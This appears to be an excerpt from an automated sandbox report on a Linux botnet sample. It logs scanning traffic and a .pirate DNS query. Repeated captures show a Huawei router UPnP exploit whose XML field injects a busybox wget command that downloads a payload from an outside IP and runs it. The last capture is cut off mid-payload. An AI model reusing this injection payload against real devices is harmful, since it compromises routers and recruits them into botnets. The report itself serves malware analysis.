Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Sample listens on a socket

Source: /tmp/skid.x86.elf (PID: 5434)

Socket: 127.0.0.1::46372

Jump to behavior

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic

TCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443

Source: unknown	TCP traffic detected without corresponding DNS query: 124.214.75.0
Source: unknown	TCP traffic detected without corresponding DNS query: 197.21.166.95
Source: unknown	TCP traffic detected without corresponding DNS query: 41.206.163.38
Source: unknown	TCP traffic detected without corresponding DNS query: 44.253.142.120
Source: unknown	TCP traffic detected without corresponding DNS query: 157.211.68.27
Source: unknown	TCP traffic detected without corresponding DNS query: 114.221.104.92
Source: unknown	TCP traffic detected without corresponding DNS query: 197.6.15.225
Source: unknown	TCP traffic detected without corresponding DNS query: 197.234.48.60
Source: unknown	TCP traffic detected without corresponding DNS query: 41.191.158.233
Source: unknown	TCP traffic detected without corresponding DNS query: 157.100.138.215
Source: unknown	TCP traffic detected without corresponding DNS query: 157.50.160.50
Source: unknown	TCP traffic detected without corresponding DNS query: 207.111.133.132
Source: unknown	TCP traffic detected without corresponding DNS query: 13.235.186.163
Source: unknown	TCP traffic detected without corresponding DNS query: 157.157.185.177
Source: unknown	TCP traffic detected without corresponding DNS query: 147.145.88.176
Source: unknown	TCP traffic detected without corresponding DNS query: 41.207.179.134
Source: unknown	TCP traffic detected without corresponding DNS query: 157.21.254.17
Source: unknown	TCP traffic detected without corresponding DNS query: 157.32.192.22
Source: unknown	TCP traffic detected without corresponding DNS query: 41.88.12.59
Source: unknown	TCP traffic detected without corresponding DNS query: 197.49.245.78
Source: unknown	TCP traffic detected without corresponding DNS query: 125.58.206.52
Source: unknown	TCP traffic detected without corresponding DNS query: 197.45.229.166
Source: unknown	TCP traffic detected without corresponding DNS query: 97.47.136.140
Source: unknown	TCP traffic detected without corresponding DNS query: 41.37.86.162
Source: unknown	TCP traffic detected without corresponding DNS query: 197.42.91.193
Source: unknown	TCP traffic detected without corresponding DNS query: 220.133.39.73
Source: unknown	TCP traffic detected without corresponding DNS query: 197.115.229.75
Source: unknown	TCP traffic detected without corresponding DNS query: 41.79.35.182
Source: unknown	TCP traffic detected without corresponding DNS query: 157.174.86.81
Source: unknown	TCP traffic detected without corresponding DNS query: 157.103.25.213
Source: unknown	TCP traffic detected without corresponding DNS query: 41.106.141.101
Source: unknown	TCP traffic detected without corresponding DNS query: 45.221.209.59
Source: unknown	TCP traffic detected without corresponding DNS query: 41.115.34.84
Source: unknown	TCP traffic detected without corresponding DNS query: 197.117.221.42
Source: unknown	TCP traffic detected without corresponding DNS query: 41.170.123.12
Source: unknown	TCP traffic detected without corresponding DNS query: 157.53.176.245
Source: unknown	TCP traffic detected without corresponding DNS query: 197.27.37.233
Source: unknown	TCP traffic detected without corresponding DNS query: 41.190.91.69
Source: unknown	TCP traffic detected without corresponding DNS query: 46.214.254.4
Source: unknown	TCP traffic detected without corresponding DNS query: 38.49.130.61
Source: unknown	TCP traffic detected without corresponding DNS query: 157.212.14.160
Source: unknown	TCP traffic detected without corresponding DNS query: 36.217.12.225
Source: unknown	TCP traffic detected without corresponding DNS query: 79.151.233.28
Source: unknown	TCP traffic detected without corresponding DNS query: 41.2.166.186
Source: unknown	TCP traffic detected without corresponding DNS query: 171.163.152.1
Source: unknown	TCP traffic detected without corresponding DNS query: 157.184.151.9
Source: unknown	TCP traffic detected without corresponding DNS query: 150.215.159.117
Source: unknown	TCP traffic detected without corresponding DNS query: 41.117.7.199
Source: unknown	TCP traffic detected without corresponding DNS query: 157.248.150.228
Source: unknown	TCP traffic detected without corresponding DNS query: 197.196.152.153

Source: unknown

DNS traffic detected: queries for: 9wg0dstmud.pirate

Source: unknown

HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo 